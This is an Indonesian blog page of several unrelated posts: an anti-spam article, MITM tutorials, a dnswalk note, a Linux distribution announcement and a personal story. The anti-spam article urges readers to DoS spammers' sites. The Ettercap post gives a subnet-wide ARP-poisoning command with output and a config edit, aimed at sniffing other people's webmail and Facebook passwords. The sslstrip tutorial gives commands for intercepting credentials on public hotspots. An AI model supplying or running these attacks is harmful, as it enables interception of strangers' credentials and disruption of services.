Senin, 02 Desember 2013

Bertarung Melawan SPAM dan SPIM


|-------[Table of Contents]-------|
-----------------------------------
1. Preface
2. Mengenal SPAM dan SPIM
---2.1 Apa itu SPAM?
---2.2 Apa itu SPIM?
3. Aksi sang SPAMMER
---3.1 Dari mana mereka tau alamat email kita?
---3.2 Bagaimana mereka melakukannya?
---3.3 Bagaimana para SPAMMER melawan AntiSpam?
4. Membantai SPAM dan SPIM
5. Penutup
---5.1 Kesimpulan
---5.2 Referensi
---5.3 Shoutz
-----------------------------------
|---[1]-[Preface]---|
Saya akan mengajak anda untuk lebih jauh mengenal SPAM dan SPIM. Pembahasan kita meliputi psikologi seorang SPAMMER dan langkah-langkah untuk melawan mereka. Enjoy... ^_^
|---[2]-[Mengenal SPAM dan SPIM]---|
2.1 Apa itu SPAM?
----------------- 
SPAM adalah sebutan bagi email yang tidak anda harapkan. SPAM biasa juga disebut UCE (Unsolicited Commercial Email), UBE(Unsolicited Bulk Email) atau juga Junk Mail. Biasanya SPAM berisi pesan komersial yang menawarkan produk tertentu, iklan dari lembaga pendidikan swasta, ajakan berbisnis, penipuan, hingga kini yang paling marak adalah iklan dari webmaster situs-situs porno dan produk-produk mereka (obat-obatan, s*x toyz, dll.. ) :P
Dampak nyata dari SPAM ternyata sangat merugikan bagi pengguna individu, terlebih lagi nagi sebuah perusahaan besar. Perusahaan-perusahaan raksasa di Eropa bahkan harus kehilangan dana milyaran Euro setiap tahunnnya hanya gara-gara SPAM. Bandwidth, waktu, tenaga dan pikiran akan banyak tersita karena SPAM. Hal ini berpengaruh pada membengkaknya tagihan Internet. Dan parahnya lagi, karyawan jelas akan kehilangan banyak waktu hanya karena harus memilah-milah mana email SPAM, mana yang dari customer.
Bisnis SPAM menjadi kian marak dan banyak diminati oleh perusahaan-perusahaan besar belakangan ini. SPAM dinilai sangat efektif dalam dunia periklanan karena dipandang mampu menjaring banyak konsumen dalam waktu singkat. Ya, pesan-pesan komersial itu bisa sampai ke tangan jutaan orang hanya dalam hitungan menit!
Setiap orang yang sudah masuk dalam daftar target para sammer akan sulit untuk melepaskan diri dari banjir email sampah ini. Rata-rata para korban akan menerima puluhan email setiap harinya.
2.2 Apa itu SPIM?
-----------------
SPIM adalah sebutan bagi "hama" messenger. Anda yang gemar melakukan chatting dengan menggunakan apliaksi Instant Messenger (IM) tentunya sudah tidak asing lagi dengan SPIM. SPIM seringkali muncul secara tiba-tiba saat kita melakukan chatting. Biasanya SPIM akan menyapa anda sebentar sambil menawarkan kepada anda untuk mengunjungi sebuah link. Alamat link yang ditawarkan pun seringkali menggoda untuk dibuka dan adakalanya berhubungan dengan nick yang anda gunakan. Misalnya nick anda adalah Spyro_ZONE, maka biasanya link yang ditawarkan untuk dikunjungi adalah http://suatu-nama-cewek-atau-cowok/xxxspyro_zone/xxxx.com
Terkadang SPIM akan berusaha menggoda anda membuka link tersebut dengan cara meyakinkan anda bahwa link tersebut akan membawa anda ke suatu tempat dengan foto-foto "menarik" (hehehe.. apalagi kalau bukan gambar-gambar dan video-video berbau p**n*grafi).
Hingga kini SPIM masih merajalela walaupun banyak juga orang yang mengabaikannya. Bagaimanapun juga, SPIM tetap saja mengganggu karean dapat membebani pc dan mengurangi kenyamanan anda dalam ber-chatting ria :)
Apakah hanya itu saja dampak dari SPIM? Tidak!! bahkan SPIM bisa menjadi seusatu yang sangat berbahaya. SPIM bisa dimanfaatkan oleh pengirimnya untuk menyebarkan worm, virus, trojan, spyware dan program-program berbahaya lainnya. Apalagi kebanyakan SPIM akan menuntun anda menuju situs-situs porno. Padahal kebanyakan situs-situs jorok saat ini sengaja dipasangi spyware oleh sang webmaster untuk mengeruk informasi dari pc pengunjungnya.
|---[3]-[Aksi sang SPAMMER]---|
3.1 Dari mana mereka tau alamat email kita?
-------------------------------------------
Mungkin anda bertanya-tanya dalam hati, dari mana para SPAMMER itu mengetahui alamat email kita? Bukankah kita tidak mengenal mereka? Bukankah kita tidak pernah merasa pernah memberikan alamat email kita kepada mereka? Berikut adalah jawaban dari pertanyaan-pertanyaan itu:
(1). Anda sendiri yang menyerahkan alamat email anda pada mereka
Lho, mana mungkin? Mana ada orang yang sengaja menunjukkan alamat rumahnya kepada penjahat untuk dijadikan sebagi target? Memang tidak secara langsung. Tanpa disadari, ternyata kita telah turut andil dalam membantu para SPAMMER dan menyodorkan alamat email kita kepada mereka.
Saat berkunjung ke situs-situs besar, kita sering tergoda untuk mengisi buku tamu ataupun shoutbox yang disediakan pada situs tersebut(jika ada). Ketika itulah kita diminta untuk memasukkan identitas berupa nick dan alamat email sebelum menuliskan komentar. Kita sendiri juga sering mencantumkan alamat email pada blog atau situs pribadi kita. Hal tersebut memang sangat lazim sebagai wujud untuk memperkenalkan diri. Namun kebiasaan itulah yang ternyata dimanfaatkan oleh para SPAMMER untuk menjaring alamat email.
SPAMMER membuat (atau memanfaatkan) suatu program perambah web untuk mencari karakter yang pasti ada dalam setiap alamat email. Ya, karakter special itu adalah karakter "@". Sebagai contoh, cobalah anda buka search engine kesayangan anda lalu ketik kata kunci @ dan tekanlah tombol search. Maka anda akan menjumpai jutaan alamat email di hadapan anda.
Beberapa penyedia layanan email gratisan ternama akan menawarkan pilihan kepada anda apakah anda ingin agar alamat email anda dimasukkan kedalam listing directory mereka atau tidak. Kita ambil contoh yahoo.com. Anda akan diberi penawaran itu ketika anda mendaftarkan diri. Jika anda menerima penawaran tersebut, maka orang lain akan dengan mudah bisa menemukan alamat email anda hanya dengan mengetikkan nama atau handle anda pada fitur search people yang disediakan yahoo. Hal ini memberikan kemudahan, namun di sisi lain SPAMMER juga ikut-ikutan menikmati kemudahan ini. SPAMMER dengan mudah menjaring alamat-alamat email tersebut dengan menggunakan suatu software perambah web yang akan menelusuri Yahoo.com dan berturut-turut menangkap alamat email yang ada di setiap halaman.
(2). Menukar-nukar karakter dalam suatu alamat email
SPAMMER menukar-nukar karakter tertentu dalam suatu alamat email. Misalnya salah satu email target adalah choki@phreaker.net. Maka SPAMMER bisa membuat suatu script perl sederhana untuk mengubah-ubah alamat email tersebut menjadi choki1@phreaker.net, choki2@phreaker.net, choki123@phreaker.net, choki486@yahoo.com, choki2000006@yahoo.com dan begitu seterusnya hingga alamat email yang didapat mencakup semua provider.
(3). Milis-milis besar
Dewasa ini SPAMMER seringkali aktif bergabung dalam milis-milis besar. Banyak sekali milis dengan anggota banyak namun tidak dimoderasi dengan baik menjadi sasaran empuk bagi sang SPAMMER. Cara yang sangat efisien untuk melakukan aksi SPAMming karena pada umumnya email yang dikirimkan ke suatu alamat milis akan diterima oleh semua anggota milis tersebut dalam waktu singkat.
Dengan demikian pekerjaan SPAMming akan menjadi lebih mudah karena kini ia, sang SPAMMER, tidak perlu susah-susah mengumpulkan alamat email. Cukup mengumpulkan daftar alamat milis-milis beranggotakan banyak namun tidak dimoderasi dengan baik, lalu kirim sebuah email SPAM ke daftar alamat itu maka dalm waktu singkat email SPAM itu sudah diterima oleh jutaan orang.
(4). Penipuan dengan berkedok Barang Gratisan
Pernah menemui situs yang menawarkan komputer laptop, ipod dan lain sebagainya secara GRATIS?? Ya, mungkin anda sering menemui situs semacam itu. Menurut webmasternya, kita berkesempatan mendapatkan barang-barang itu gratis dengan cara mudah, yaitu cukup dengan melakukan registrasi dan kita akan mendapat semacam nomor sandi khusus. Kita hanya diminta untuk mencari orang sebanyak-banyaknya untuk melakukan hal yang sama, namun orang yang kita cari harus memakai sandi milik kita sebagai indikator bahwa orang tersebut adalah hasil dari invitation kita. Semakin banyk orang yang kita invite, semakin besar kesempatan kita mendapat IPOD atau LAPTOP gratis.
Sebaiknya jangan terlalu percaya dengan program semacam ini. Kebanyakan program seperti ini hanyalah tipuan belaka. Tujuan mereka apa???
  • Saat melakukan registrasi, kita pasti dimintai alamat email. Nah, disinilah sang webmaster yang ternyata ialah seorang spamer mendapat untung. Semakin banyak orang yang kita ajak untuk meregister, semakin banyak email valid yang didapat oleh sang spammer.
  • Celah untuk melakukan Social Enginering dan penipuan-penipuan lain lebih lanjut mulai terbuka karena saat registrasi anda diminta memsukkan identitas asli anda beserta alamat rumah dan nomor telepon.
Nah, cukup berbahaya bukan?? Sayangnya, banyak orang buta akan celah yang satu ini karena silau dengan kata "FREE NOTEBOOK!" :P
(5). CD khusus
Dari hasil percakapan saya dengan seorang kenalan yang berprofesi sebagai seorang SPAMMER, ternyata ada tempat-tempat tertentu yang menjual cd-cd khusus yang berisi jutaan alamat email. Harga yang ditawarkan pun cukup miring. Para SPAMMER bekerjasama dengan SPAMer-SPAMMER lain untuk memperjual-belikan CD-CD tersebut pada perusahaan-perusahaan yang berminat maupun kepada sesama SPAMMER. Bisnis semacam ini ternyata cukup menguntungkan dan semakin marak.
3.2 Bagaimana mereka melakukannya?
----------------------------------
Sangat mudah untuk melakukan aksi SPAMming. Tidak dibutuhkan keahlian khusus untuk bisa menjadi seorang SPAMMER. Setelah seorang SPAMMER memperoleh daftar alamat email yang akan dijadikan target, ia akan menggunakan software-software pengirim email massal untuk melakukan aksinya.
Atau bahkan SPAMMER bisa dengan mudah membuat script perl sederhana untuk melakukan pengiriman email massal. Tidak terlalu sulit untuk membuatnya, namun hasilnya cukup bisa diperhitungkan. Banyak SMTP (Siple Mail Transfer Protocol) open relay tersedia secara Cuma-Cuma. Ada pula yang berbayar dan semua itu bisa didapat dengan mudah. Saya sudah pernah menyingung mengenai SMTP open relay di artikel lain www.spyrozone.net
Sedangkan untuk mengirim SPIM, SPAMMER tingal mengaktifkan sebuah program kecil yang berfungsi sebagai “bots”. Bots tersebut akan melakukan suatu percakapan dengan pengguna IM seakan-akan ia adalah manusia. Bots mampu mendeteksi siapa-siapa saja yang baru join kedalam suatu room, menyapa mereka secara otomatis lalu pergi setelah meninggalkan sebaris iklan. Bots juga memiliki kemampuan mengumpulkan informasi nama-nama chatter lain kemudian mengirimkan pesan iklan dengan ID yang ia dapatkan itu.
Metodenya, bots akan mengajak targetnya untuk memasukan ID bots ke dalam buy list. Setelah target menerima ajakan tu, saat itulah bots mengeruk informasi berupa daftar identitas yang ada dalam buddy list target.
3.3 bagaimana SPAMMER melawan AntiSpam
--------------------------------------
SPAMMER menyadari bahwa cepat atau lambat filter-filter AntiSpam akan membantai email SPAM yang mereka tebarkan. SPAMMER memiliki kiat khusus untuk mengatasi hal ini:
(1). Memanipulasi subject email
Beberapa fitur SPAM akan mengategorikan SPAM berdasarkan subject email. Subject email berbau iklan akan mudah dikenali sebagai SPAM. SPAMMER menyadari hal ini dan mengolah kata sepintar mungkin untuk mengelabuhi SPAM filter. Salah satu cara ialah dengan menambahkan kata RE: di depan subjet email. Pada umumnya untuk email “normal”, kata RE: mewakili kata REPLY yang menandakan email tersebut adalah email balasan dari email yang dikirim sebelumnya.
Dengan menambahkan kata RE:, SPAMMER berusaha menipu filter SPAM sekaligus mengecoh korban, menumbuhkan persepsi seolah-olah itu adalah email yang valid, email sah yang seakan-akan adalah email balasan untuk user.
(2). Mengacaukan kata-kata dalam email
Metode ini dilakukan SPAMMER dengan car mengacaukan kata-kata yang ditulis dalam body email. Pesan yang kita terima adalah sebuah pesan tanpa makna yang membingungkan. Dalam email itu adakalanya kita disapa seolah-olah sang pengirim sudah kenal sangat baik dengan kita. Barulah setelah itu mereka mencantumkan iklan di akhir paragraf.
(3). Membuat iklan dalam format gambar
Para SPAMMER sempat “tersedak” saat metode bernama “filter bayes” hadir. Filter penjaring SPAM dengan metode ini mampu membaca body email dan mampu “belajar” sendiri untuk mengenali SPAM. Bahkan filter ini bisa menjadi semakin canggih dan kemampuannya akan semakin meningkat jika dilatih. Akan tetapi, sang SPAMMER menjadi semakin pintar, mereka memformat text ikan mereka menjadi gambar sehingga tidak bisa dijaring oleh filter bayes karena filter bayes hanya bisa membaca teks.
Metode ini cukup sukses dan banyak diterapkan oleh para SPAMMER dewasa ini.
|---[ 4 ]---[ Membantai SPAM dan SPIM ]---|
Jengkel dengan SPAMMER? Anda bisa bertrng dengan mereka dan membuat mereka menjadi lebih jengkel daripada anda :) Kiat-kiat melawan mereka ialah:
(1). Mengirim informasi palsu pada SPAMMER
Anda bisa mengecoh SPAMMER dengan mereply email yang dikirim oleh sang apammer. Tulis suatu email balasa yang menyatakan seolah-olah email yang dikirim sang SPAMMER tidak sampai ke tangan user. SPAMMER akan mengira email anda sudah tidak aktif lagi dan dia akan menghapus alamat email anda dari database mereka. Ada cara otomatis untuk melakukan hal ini. Gunakan tool pembasmi SPAM yang menggunakan metode ini do http://mailwasher[dot]net
(2). Menguras bandwdth SPAMMER
Akseslah link yang dipromosikan oleh sang SPAMMER sebanyak mungkin. Jika anda mampu, buatlah tool otomatis untuk itu, untuk melakukan serangan Denial Of Service terhadap alamat itu. Sang SPAMMER akan menderita kerugian besar karena trafficnya membanjir tapi tidak ada pemasukan. Jika serangan anda sukses, mereka akan menderita kerufian uang, tenaga dan waktu :)
(3). Manfaatkan fasilitas dari provider
Jika anda pengguna layanan email berbasis web atau menggunakan layanan gratisan seperti Yahoo, Hotmail atau GMAIL misalnya, manfaatkan saja fasilitas  filter SPAM yang mereka berikan. Setiap ada email SPAM yang berhasil hinggap di inbox anda, segera tandai email itu sebagai SPAM. Dengan cara ini, alamat IP milik sang SPAMMER akan di blacklist.
(4). Hindari ajakan chatter asing
Untuk berjaga-jaga dari bahaya SPIM, hindari untuk menerima ajakan chatter asing yang meminta anda memasukkan mereka ke dalam buddy list anda.
(5). Tool AntiSpam dan antiSPIM
Beragam tool AntiSpam dan antiSPIM dapat anda dapatkan cuma-Cuma dengan mudah. Beberapa memang meminta biaya registrasi untuk fitur yang lebih komplit. Namun versi gratisannyapun tak kalah tangguh.
(6). Mengbah kebiasaan & selalu waspada
Ubah kebasaan anda dalam menulis alamat email ketika berada di tempat-tempat rawan. Ini hanya sekedar saran saja, anda bisa meniru kebiasaan para Hacker dengan mengubah karakter @ dengan [at] dan . dengan [dot]. Contohnya: spyro_Zone[at]yahoo[dot]com Tetapi tentunya ini hanya berlaku untuk penulisan saja.
Hindari juga mengisi komentar pada guestbook atau shoutbox gratisan yang terlihat lemah. Goestbook gratisan biasanya menjadi sasaran empuk bagi SPAMMER untuk mencari mangsa.
|---[ 5 ]--- [ Penutup ] ---|
5.1 Kesimpulan
-----------------
Pertarungan melawan SPAM dan SPIM seakan-akan adalah pertarungan tanpa akhir. Kedua belah pihak, SPAMMER dan para pengembang AntiSpam akan senantiasa berusaha mencari inovasi-inovasi baru. Yang bisa kita lakukan hanya mempersempit ruang gerak mereka dengan selalu waspada dan memanfaatkan filter-filter SPAM yang ada dengan baik.
  
5.2 Referensi
-------------
    -         mailwasher.com
    -         iks-jena.de
    -         ddv.de 
  
6.3 Shoutz
-------------
    -         Vindika Anastasya :) you’re the depest love I’v ever had :)
    -         All member of www.spyrozone.net .. stay alert!
    -         Semua kontributor yang selama ini banyak menyumbangkan ide-ide kreatifnya kepada kami di spyro zone.. terima kasih atas karya-karya anda. Kami akan selalu terbuka menerima kreatifitas-kreatifitas anda.

ETTERCAP DI BACKTRACK 5

sekarang udah ga usah pake script segala untuk sniffing password https seperti gmail, yahoo, facebook dll
cukup dengan menjalankan ettercap saja
Code:
root@bt:~# ettercap -T -q -M arp -i wlan0 // //
begini hasilnya??

==>>
root@bt:~# ettercap -T -q -M arp -i wlan0 // //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on wlan0... (Ethernet)

wlan0 -> 00:22:FA:20:B3:8E 172.16.40.251 255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

254 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

DHCP: [1C:65:9D:26:C1:31] REQUEST 172.16.40.65
DHCP: [00:17:C4C:C33] REQUEST 172.16.40.217
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] REQUEST 172.16.40.248
DHCP: [84:A8:E4:462:3B] DISCOVER
DHCP: [172.16.40.1] OFFER : 172.16.40.245 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [172.16.40.1] ACK : 172.16.40.245 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [84:A8:E4:462:3B] REQUEST 172.16.40.245
DHCP: [68:A3:C4:26:77:C7] REQUEST 172.16.40.140
DHCP: [00:21:00:74:21:49] REQUEST 172.16.40.113
DHCP: [172.16.40.1] ACK : 172.16.40.113 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [68:A3:C4:26:77:C7] REQUEST 172.16.40.140

yang saya warnain biru itu harus diedit om biar jadi 0
caranya:

root@bt:~# nano /etc/etter.conf

Code:
############################################################################
#                                                                          #
#  ettercap -- etter.conf -- configuration file                            #
#                                                                          #
#  Copyright (C) ALoR & NaGA                                               #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
#  $Id: etter.conf,v 1.78 2004/10/12 15:28:38 alor Exp $                   #
#                                                                          #
############################################################################

[privs]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default



#####################################
#       redir_command_on/off
#####################################

#---------------
#     Linux
#---------------

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#---------------

silahkan edit ettercapnya seperti diatas lalu save.

DnsWalk

Aplikasi dnswalk yang berada di Backtrack-informaton gathering-Network analys-Dns analys-Dnswalk yang beguna untuk mencari informasi tentang daftar dari alamat IP dan Hostname yang berhubungan yang terdapat didalam Dns Server target,bekerja dengan memanfaatkan Dns Zone Transfer
Cara kerja DNS zone transfer adalah dengan menduplikasi database DNS dari server DNS yang asli kepada server DNS yang lain atau biasa disebut dengan istilah slave DNS server.
Dengan cara ini, database dari server DNS yang asli dan slave DNS server akan saling menyamakan data. Proses menyamakan ini lah yang pada DNS protokol bisa digunakan oleh hacker untuk mendapatkan informasi dari domain target.
Disamping itu Dnswalk juga berguna untuk mengecek konsiten dan akurasi dari database server .

Penggunaanya:
./dnswalk [doamin target].
./dnswalk yahoo.com.













Dari hasil walk saya di yahoo.com konfigurasi server Dns-nya tidak mengaktifkan ZOne Transfer.Fungsi zone-transfer digunakan bagi Administrator untuk alarm ketika ada serangan dari hacker.

Happy Hacking

Tutorial Sslstrip

Apakah anda sering melakukan sniffing atau ngintip-ngintip password yang berseliweran di hotspot tempat anda Online..ehhehhe disini saya akan memberikan salah satu trik MITM (Man In The Middle Attack); Tapi sebelumnya kita install toolsnya (SSLSTRIP):

 wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz


tar zxvf sslstrip-0.9.tar.gz 




preman@bt:~/sslstrip-0.9# python setup.py install
Jalankan Ssltripnya:
sslstrip

=====================================================================
TREAD  LANJUTANNYA:
Di BACKTRACK 5 R3 kita sslstrip sudah terinstall di :
BACKTRACK==>EXPLOITATION TOOLS==>WEB EXPLOITATION TOOLS==>SSLSTRIP
OR
cd /pentest/web/sslstrip
Mengconfigurasi mesin penyerang untuk ip forwarding
netstat -nr = Untuk mengetahui gateway ip address kita
Meroute semua http ke sslstrip ke port 8080
Jalankan ARPSPOOF
arpspoof -i -t
Jalankna sslstripnya:
./sslstrip.py -l 8080
disini kita tunggu si victim untuk mengakses internet yang sudah kita route http-nya
maaf saya gak punya sample: gak install OS lain karena low memory. 


Source :Gilakomputer.net

Dracos version 2 FireHorse


./DRACOS LINUX VERSI 2 CODENAME FIREHORSES.\

Dracos-linux saat ini telah mencapai versi 2 dengan melakukan beberapa perubahan serta pemantapan dalam segi penggunaan dan kelengkapan tools. Dengan melihat kebutuhan dalam bidang security auditor maka kami mengeluarkan versi terbaru yang mengemas berbagai tools dari beragam komunitas nasional maupun internasional. Seluruh tools yang kami distribusikan berdiri pada standart hukum GNU free software dimana seluruh tools memegang asas opensource, non commercial dan non waranty.

Desktop environment

Kami memilih xcfe sebagai desktop environment. Tidak seperti pada dracos versi sebelumnya yang menggunakan fluxbox, kami mempertimbangkan dari segi kemudahan dalam penggunaan, daya tarik dan pelbagai pertimbangan kemajuan tehnologi desktop environment saat ini.

Sekilas mengenai Dracos Linux Versi 2

Dracos versi 2 di bangun berbasis Linux Ubuntu Server 11.04 ( LTS ) Life Time Support. Dracos v2 saat ini masih dalam versi beta dan membutuhkan banyak penyempurnaan dan ujicoba di dalam komunitas. Karena itu kami masih menggunakan standart kernel ubuntu 3.2.0 yang telah mengalami pengembangan patching pada berbagai vendor hardware pendukung.
Saat ini dracos versi 2 kami beri kode : firehorses telah mencapai akhir pengembangan pada versi beta-1. Penyempurnaan akan kami teruskan sampai dracos v2 mencapai versi final. untuk itu saya lampirkan beberapa detail struktur sistem operasi dracos linux pada versi ini. Untuk saat ini dracos linux versi 2 memiliki 4 sub besar kategori tools yang meliputi bidang

Ucapan Terima Kasih

Kami mengucapkan terima kasih kepada seluruh pihak yang telah mendukung setiap pembangunan sistem operasi ini hingga selesai, baik dalam bentuk moril maupun dana. Kami mengucapkan terima kasih sebesar-besarnya kepada codewall-security ( CwS ) yang telah membiayai seluruh projek ini, Indonesian Backtrack Team yang telah ikut menjadi team dev serta auditor, Indonesian Hacker Team , khususnya agan angga yang telah memberikan lapak unduh dan repo dracos,Indonesian Blackhat Team, yang telah memberikan dukungan secara moral. Secara khusus kami berterima kasih kepada bapak Iwan Sumantri selaku pembina dan sesepuh IBT yang saat ini juga bertanggung jawab dalam badan nasional internet security ( IDSIRTII ) Dan terima kasih kami kepada seluruh pengembang ubuntu , debian dan seluruh pengembang tools yang telah mendedikasikan ilmu dan pemikirannya bagi dunia komunitas peretas Internasional. Thumbs Up for you, guys !!

Penetration Testing

Penetration testing tools category meliputi kumpulan tools yang mengikuti standart ISO ( international standart organization ) dan menjadi patokan penggunaan tools peretas di tanah air maupun internasional. Penetration testing terdiri dari beberapa subkon penting di antara lainya


Defensive ( IPS/IDS ) Tools

Defensive tools category meliputi kumpulan tools pertahanan dan beberapa tools untuk hardening linux. Alasan team dev kami, untuk ikut memasukan tools-tools tersebut didalam dracos-linux adalah sebagai berikut.
  • Ujicoba dan pembuktian ( POC ) Salah satu hasil yang ingin di capai oleh setiap peretas adalah hasil patching dan solusi yang dapat di berikan kepada client mereka. Karena itu kami menempatkan beberapa tools standart yang dapat di gunakan untuk langsung di ujicoba dalam menangkis serangan terkait penetration testing itu sendiri serta menemukan standart pemecahan secara global.
  • Bahan pembelajaran dan dokumentasi Dengan penambahan sesi defensive tersebut kami berharap akan muncul nilai tambah dalam segi bahan pembelajaran terharap IDS/IPS, honeyspot, firewall, dsb.
  • Alasan pribadi dan pengalaman pribadi dari author Adapun hal ini agaknya tampak aneh untuk kami kemukakan tapi kami menjunjung tinggi nilai kepolosan forum sehingga ada baiknya kami ceritakan dan kami angkat menjadi salah satu alasan kami memasukan kategori ini


Adapun kategori defensive kami klasifikasikan dalam subkon-subkon di bawah ini.

















Forensics Tools

Melihat kondisi meningkatnya kejahatan cyber di Indonesia akhir-akhir ini , kami pun menambahkan kategori forensics. Beberapa subkon dari kategori forensics mewakili beberapa tahap penelusuran dan penindaklanjutan lebih lanjut. Beberapa subkon tersebut antara lain
Yang menarik disini adalah adanya sub-kategori Anti Forensics. Tentu saja kami menggunakan Anti Forensics untuk menjadi perbandingan terhadap kemampuan tools forensics standart yang sedang beredar di kalangan peretas saat ini. Attacker yang menggunakan beberapa tools anti forenscis tampaknya berusaha menghambat team pencari fakta dan penggalian serta pengamatan artifak kejahatan cyber.

Reverse Engineering

Tahap terakhir dari kategori tools dracos versi 2 adalah reverse engineering. Reverse Engineering sangat di butuhkan pada zaman ini mengingat persaingan global antar negara maju dan negara berkembang saat ini. Adanya tehnologi yang telah disusupi oleh negara-negara tertentu dapat mengontrol dan menjajah bangsa ini untuk kedua kalinya.


















Project Time Line

Repository List :
SOURCE:


HAPPY HACKING!!!!!!!!

Minggu, 14 Juli 2013

Korsletnya Hati Nurani

Bismillahirrahmaanirrahiim…

Cerita berikut ini adalah kisah nyata yang terjadi pada saya beberapa waktu yang lalu dan saya berusaha sekuat tenaga untuk tidak mengurangi atau menambah-nambahkan isinya. Saya langsung mulai saja ke inti ceritanya tanpa banyak pendahuluan.

Sekitar setahun yang lalu dari saat artikel ini ditulis, saya mendapat e-mail dari seseorang. E-mail ini berisi tawaran pekerjaan buat saya dari sebuah perusahaan yang merupakan anak dari satu induk perusahaan yang cukup besar. Induk perusahaannya itu sendiri termasuk dalam daftar 100 perusahaan yang paling “sehat” dan “kaya” di Indonesia. Dan yang mengirimi saya e-mail adalah General Manager dari perusahaan itu. Tawaran pekerjaan ini datang karena salah seorang kenalan merekomendasikan saya untuk satu posisi tertentu pada perusahaan tersebut. Posisi itu adalah trainer atau pelatih bagi para karyawan dari perusahaan-perusahaan klien mereka, yang setelah saya lihat ternyata juga merupakan perusahaan-perusahaan ternama dari dunia perbankan, asuransi, BUMN dll. Trainer untuk apa? Macam-macam. Mulai dari pengembangan karakter, leadership sampai selling skill.

Presentasi dan public speaking bukan barang baru bagi saya. Saya mendalami dan mempraktekkan ilmu public speaking, kepemimpinan dan psikologi massa selama kurang lebih 6 tahun untuk keperluan bisnis sejak masih duduk di bangku kuliah. Berbicara, presentasi, melatih dan pidato di hadapan puluhan, ratusan sampai ribuan audiens pernah saya lakoni. Sebelum akhirnya saya memutuskan untuk meninggalkan dunia itu beberapa tahun yang lalu dengan beberapa alasan pribadi.

Kembali ke tawaran pekerjaan tadi. Terus-terang, saya tertarik. Ini kesempatan saya untuk mengasah kembali skill saya di dunia human development. Singkat kata, saya membuat janji dengan sang General Manager tersebut dan begitu seriusnya dia ingin merekrut saya, bukan saya yang harus datang ke Jakarta (kantor pusat mereka), melainkan dia sendiri yang berniat mendatangi saya di Makassar. Saya pun berangkat dari Sorowako menuju Makassar dan kami bertemu di sebuah café waralaba ternama di Makassar.

Mulailah dia mempresentasikan perusahaannya. Menggunakan laptop ter-mutakhir keluaran Apple, dia fasih berbicara panjang lebar mengenai gambaran umum job description dari calon pekerjaan saya nantinya. Di akhir presentasi, dia menyodorkan beberapa lembar kertas kontrak untuk saya tandatangani. Saya bilang, sebaiknya saya bawa pulang dulu kontrak tersebut untuk saya pelajari di rumah, Insya Allah besok kita ketemu lagi. Dalam hati saya saat itu, besok adalah hari dimana saya resmi bergabung dalam team mereka. Ya, saat itu saya sudah 99% tertarik untuk menerima pekerjaan tersebut.

Sampai di rumah, saya mempelajari kembali kontrak itu. Tidak ada yang salah dengan isinya. Mengenai salary, ada beberapa poin perjanjian yang saya sudah tidak ingat lagi keseluruhan isinya, yang jelas seingat saya mereka akan membayar saya sekitar 10-20 juta per-minggu. Berarti per-bulan penghasilan saya bisa mencapai 40-80 juta, dengan tugas-tugas pekerjaan yang “ringan” menurut saya. Tidak heran memang, mengingat induk perusahaan mereka adalah salah satu perusahaan terbesar, terkaya dengan pertumbuhan profit yang sangat sehat setiap tahunnya (menurut Forbes). Saya menandatangani kontrak tersebut malam itu juga.

Besoknya, kami bertemu lagi. Entah kenapa saat itu saya belum serta-merta menyerahkan kontrak yang sudah ditandatangani. Kami ngobrol santai, makan siang bareng dan membicarakan hal-hal lain di luar pekerjaan. Jelas sekali, orang ini terlatih untuk ice breaking, yaitu ilmu berkomunikasi untuk memecah kebuntuan, mencairkan suasana dan mendekatkan diri dengan lawan bicara. Saya pun begitu, jadi kami cepat akrab. Beberapa jam berlalu dan saya belum juga menyerahkan kontrak tersebut.

Dia bercerita tentang senior sekaligus mentornya di perusahaan itu. Seseorang yang bernama melayu dan berkebangsaan Singapura. Digambarkannya ia sebagai orang yang tegas, disiplin dan old school. Saya menyimak, tersenyum, tertawa dan tertarik. “Berat dibimbing sama dia. Salah sedikit kita dilemparin asbak”, katanya sambil ketawa seolah-olah “ketimpuk asbak” adalah hal yang biasa terjadi. Saya juga ketawa, karena menurut saya itupun hal lucu dan saya menghargai orang-orang yang disiplin. Yah, secara pribadi saya memilih ditimpuk asbak oleh orang yang membina daripada dipuji-puji oleh orang yang tidak membawa manfaat apa-apa. Saya makin tertarik.

Kemudian dia melanjutkan, “Tapi dia juga orang yang santai di luar pekerjaan. Kadang kalo satu pekerjaan berhasil selesai bagus, kita ditraktir masuk bar dan nggak pulang sebelum ada yang muntah atau jatuh”.

Glek! Gubrak!

Pasti! Pasti orang ini bisa melihat perubahan seketika ekspresi wajah saya. Saya bukan orang yang bebas dari dosa-dosa masa lalu. Banyak sudah dosa saya di masa lalu. Dosa-dosa yang ingin saya tinggalkan. Dan bagi saya, komitmen meninggalkan kesalahan berarti juga komitmen untuk menjauhi segala hal yang berpotensi  mendekatkan saya kepada melakukan kesalahan tersebut. Salah satunya dan yang terutama adalah LINGKUNGAN.

